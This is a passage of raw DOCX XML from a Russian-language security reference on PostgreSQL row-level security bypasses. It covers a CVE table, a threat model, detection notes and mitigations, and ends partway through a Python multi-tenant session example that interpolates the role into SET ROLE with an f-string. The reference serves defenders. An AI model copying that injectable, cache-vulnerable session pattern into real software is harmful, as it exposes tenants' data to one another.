          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фильтр чтения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POLICY ... WITH CHECK (expr)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фильтр записи (</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применяется даже к owner таблицы (по умолчанию RLS bypass для owner и superuser).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница RLS в design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RLS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">per-statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> фильтрация: policy вычисляется для каждой row при scan.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RLS привязан к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или к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-target).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RLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass-нут</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для superuser и owner (без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RLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">применяется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к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 (с WITH CHECK), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не применялся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к MERGE в PG 15.0–15.3 (R11/CVE-2023-39418).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Шесть подразделов 3.17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Вектор</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Механика</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Затронутые версии PG</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Subquery / CTE + plan-cache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CVE-2024-10976</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R9)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RLS-фильтр кэшируется в plan под одной ролью, исполняется под другой</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20</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MERGE не применяет UPDATE/SELECT policy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CVE-2023-39418</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R11)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Через MERGE INSERT обходится UPDATE-policy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только PG 15.0–15.3</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reset path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CVE-2024-10978</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R8)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После SET ROLE plan-cache применяет policy неверной роли</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17.0, 16.4, 15.8, 14.13, 13.16, 12.20</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Optimizer stats обходят ACL/RLS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CVE-2025-8713</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (R26)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Custom operator на planning-этапе sample-ит </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pg_statistic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> чужих таблиц</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17.5, 16.9, 15.13, 14.18, 13.21</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SECURITY DEFINER функции и RLS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(pattern)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SD-функция вызывается под owner — RLS bypass для superuser-owner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версии</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(общая)</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3.13.6 SECURITY DEFINER + search_path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Параллельный класс, разбирается в 3.13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версии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница с другими категориями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3.17.3 пересекается с 3.13.1 (CVE-2024-10978). Граница: 3.13.1 — получение чужой роли как vector privilege escalation; 3.17.3 — тот же CVE как vector data exfiltration. Cross-ref между ними.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 RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельная категория, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">доступ к чужим строкам через 3.17 не означает RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically. RCE требует или superuser-роль (3.13), или COPY TO PROGRAM (3.7.1) — RLS обход даёт только data-access.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 Извлечение метаданных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.17.4 (CVE-2025-8713) родственен 3.8.6 (CVE-2024-4317 pg_stats_ext leak) — оба используют optimizer-stats path. Граница: 3.17.4 — bypass конкретной RLS policy через custom operator; 3.8.6 — leak метаданных через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view.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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересекается с 3.17.5 в том смысле, что SD-функции — common источник RLS-bypass. Граница: 3.16.5 — RCE через identifier-injection; 3.17.5 — data-access через RLS bypass без injection.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общая mitigation: 3.17 — почему обычные права недостаточны, нужен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для owner.</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3.17.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Subquery / CTE + plan-cache — CVE-2024-10976 (R9), кэшированный план под старой ролью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3.17.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> MERGE не применяет UPDATE/SELECT policy — CVE-2023-39418 (R11), узкое окно PG 15.0–15.3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3.17.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SET ROLE reset — CVE-2024-10978 (R8), связан с 3.13.1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3.17.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Optimizer stats — CVE-2025-8713 (R26), custom operator на planning-этапе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3.17.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SECURITY DEFINER и RLS — classical pattern, без CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все шесть векторов 3.17 работают по одной из трёх схем:</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Bug в reset/setup пути</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.17.1, 3.17.3) — баг сервера, когда RLS-policy применяется неверной ролью из-за plan-cache + SET ROLE.</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Statement type обходит policy applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.17.2) — MERGE не triggers UPDATE/SELECT policy в окне PG 15.0–15.3.</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Side-channel через optimizer/SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.17.4, 3.17.5, 3.13.6) — RLS обходится не напрямую, а через другие mechanisms, которые читают/пишут rows без проверки policy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Различие важно для детекции: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Схема 1 — invisible в коде атакующего (только sequence запросов).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Схема 2 — visible в SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-statement в pg_stat_statements).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Схема 3 — visible в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (custom operator, SD function без FORCE RLS).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита везде разная: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bug-related (1, 2) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на patched PG-версию</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pattern-related (3)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на critical tables; явный SET ROLE внутри SECURITY DEFINER функций; audit custom operators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Managed-провайдеры контекст</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RLS — standard PostgreSQL feature, доступная во всех managed providers. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical difference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: PG-version policy у providers разная — RDS обычно отстает на 1–2 minor versions от upstream, что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-fix delays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для 3.17.1/3.17.3. Для 3.17.2 (PG 15.0–15.3) — managed providers обычно не были в этом окне (15.0 релиз был в октябре 2022, провайдеры обновлялись пакетно с 15.4+).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.1 Subquery / CTE + plan-cache (R9, CVE-2024-10976)</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В PostgreSQL до 17.1/16.5/15.9/14.14/13.17/12.21 (фикс 14.11.2024) RLS-политика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пересчитывалась при reuse plan-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в случаях, когда таблица с RLS читается из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">subquery, CTE, security invoker view, или SQL-language function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если приложение использует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per-request для multi-tenant изоляции и тот же prepared statement выполняется под несколькими ролями последовательно, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plan кэшируется с RLS-фильтром первой роли и применяется для всех последующих ролей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это нарушение RLS-семантики — каждая роль должна видеть только свои rows, но через cached plan атакующий-tenant видит rows другого tenant. CVE-2024-10976 — продолжение цепочки RLS-багов: CVE-2016-2193 (cached plan in plpgsql), CVE-2023-2455 (security definer plus row security).</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app/db/session.py — multi-tenant session с SET ROLE per-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from contextlib import asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy.ext.asyncio import async_sessionmaker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@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def tenant_session(tenant_role: str):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Connection с SET ROLE для конкретного tenant"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Берёт connection из pool, делает SET ROLE</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session.execute(text(f"SET ROLE {tenant_role}"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            yield session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        finally:</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session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
